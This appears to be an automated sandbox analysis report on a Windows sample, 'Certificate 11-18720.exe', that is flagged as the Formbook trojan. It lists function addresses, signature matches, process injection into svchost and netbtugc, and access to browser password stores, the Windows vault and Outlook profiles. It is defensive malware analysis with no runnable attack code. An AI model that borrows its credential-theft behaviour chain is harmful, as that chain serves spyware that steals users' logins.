            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C828C52_2_05C828C5
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C650BC2_2_05C650BC
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C633652_2_05C63365
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeCode function: 2_2_05C652E52_2_05C652E5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DC02C03_2_02DC02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE02743_2_02DE0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E003E63_2_02E003E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4E3F03_2_02D4E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFA3523_2_02DFA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DD20003_2_02DD2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF81CC3_2_02DF81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E001AA3_2_02E001AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF41A23_2_02DF41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DC81583_2_02DC8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDA1183_2_02DDA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D301003_2_02D30100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5C6E03_2_02D5C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D3C7C03_2_02D3C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D647503_2_02D64750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D407703_2_02D40770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DEE4F63_2_02DEE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF24463_2_02DF2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE44203_2_02DE4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E005913_2_02E00591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D405353_2_02D40535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D3EA803_2_02D3EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF6BD73_2_02DF6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFAB403_2_02DFAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D6E8F03_2_02D6E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D268B83_2_02D268B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4A8403_2_02D4A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D428403_2_02D42840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E0A9A63_2_02E0A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D429A03_2_02D429A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D569623_2_02D56962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFEEDB3_2_02DFEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D52E903_2_02D52E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFCE933_2_02DFCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D40E593_2_02D40E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFEE263_2_02DFEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D32FC83_2_02D32FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DBEFA03_2_02DBEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB4F403_2_02DB4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D60F303_2_02D60F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE2F303_2_02DE2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D82F283_2_02D82F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D30CF23_2_02D30CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE0CB53_2_02DE0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D40C003_2_02D40C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D3ADE03_2_02D3ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D58DBF3_2_02D58DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDCD1F3_2_02DDCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4AD003_2_02D4AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5B2C03_2_02D5B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5D2F03_2_02D5D2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE12ED3_2_02DE12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D452A03_2_02D452A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D8739A3_2_02D8739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D2D34C3_2_02D2D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF132D3_2_02DF132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DEF0CC3_2_02DEF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D470C03_2_02D470C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF70E93_2_02DF70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFF0E03_2_02DFF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D4B1B03_2_02D4B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02E0B16B3_2_02E0B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D2F1723_2_02D2F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D7516C3_2_02D7516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF16CC3_2_02DF16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D856303_2_02D85630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFF7B03_2_02DFF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D314603_2_02D31460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFF43F3_2_02DFF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDD5B03_2_02DDD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF75713_2_02DF7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DEDAC63_2_02DEDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DDDAAC3_2_02DDDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D85AA03_2_02D85AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DE1AA33_2_02DE1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFA493_2_02DFFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF7A463_2_02DF7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB3A6C3_2_02DB3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB5BF03_2_02DB5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D7DBF93_2_02D7DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5FB803_2_02D5FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFB763_2_02DFFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D438E03_2_02D438E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DAD8003_2_02DAD800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D499503_2_02D49950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5B9503_2_02D5B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DD59103_2_02DD5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D49EB03_2_02D49EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D03FD23_2_02D03FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D03FD53_2_02D03FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D41F923_2_02D41F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFFB13_2_02DFFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFF093_2_02DFFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DFFCF23_2_02DFFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DB9C323_2_02DB9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D5FDC03_2_02D5FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF1D5A3_2_02DF1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02D43D403_2_02D43D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02DF7D733_2_02DF7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_004615E03_2_004615E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045C7C73_2_0045C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045C7D03_2_0045C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045C9F03_2_0045C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0045AA703_2_0045AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_004630EE3_2_004630EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_004630F03_2_004630F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_00479FD03_2_00479FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4A0AF3_2_02A4A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4B8B43_2_02A4B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4B9D63_2_02A4B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4ADD83_2_02A4ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02A4BD6C3_2_02A4BD6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875130 appears 58 times
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: String function: 005E6AC0 appears 42 times
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: String function: 005DEC2F appears 68 times
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: String function: 005EF8A0 appears 35 times
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02D75130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02DBF290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02D2B970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02D87E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 02DAEA12 appears 86 times
            Source: Certificate 11-18720.exe, 00000000.00000003.1694898450.0000000003A63000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-18720.exe
            Source: Certificate 11-18720.exe, 00000000.00000003.1695891243.0000000003C5D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-18720.exe
            Source: Certificate 11-18720.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0060CE7A GetLastError,FormatMessageW, 0_2_0060CE7A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005FAB84 AdjustTokenPrivileges,CloseHandle, 0_2_005FAB84
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_005FB134
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0060E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_0060E1FD
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_00606532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_00606532
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_0061C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_0061C18C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Code function: 0_2_005C406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_005C406B
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | File created: C:\Users\user\AppData\Local\Temp\aut15DD.tmp
            Source: Certificate 11-18720.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000003.00000003.2031301033.00000000007B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINH,{ENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: netbtugc.exe, 00000003.00000002.4134914771.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2031301033.00000000007D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 11-18720.exe | ReversingLabs: Detection: 95%
            Source: unknown | Process created: C:\Users\user\Desktop\Certificate 11-18720.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Certificate 11-18720.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Certificate 11-18720.exe | Static file information: File size 1197568 > 1048576
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 11-18720.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
